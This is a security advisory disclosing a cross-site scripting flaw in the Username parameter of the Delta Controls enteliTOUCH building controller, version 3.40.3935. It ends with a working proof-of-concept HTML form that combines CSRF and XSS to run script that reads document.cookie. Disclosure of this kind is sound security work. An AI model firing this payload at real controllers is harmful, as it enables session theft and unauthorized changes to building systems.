<!DOCTYPE html>
<head><title>enteliTouch XSS</title></head>

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)

Vendor: Delta Controls Inc.
Product web page:
Affected version: 3.40.3935

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.

Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.

Tested on: DELTA enteliTOUCH

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2022-5703
Advisory URL:


<form action="" method="POST">
<input name="userInfo" type="hidden" value=""/>
<input name="UL_SelectedOptionId" type="hidden" value=""/>
<input name="Username" type="hidden" value='"&gt;&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;'/>
<input name="formAction" type="hidden" value="Delete"/>
<input type="submit" value="CSRF XSS Alert!"/>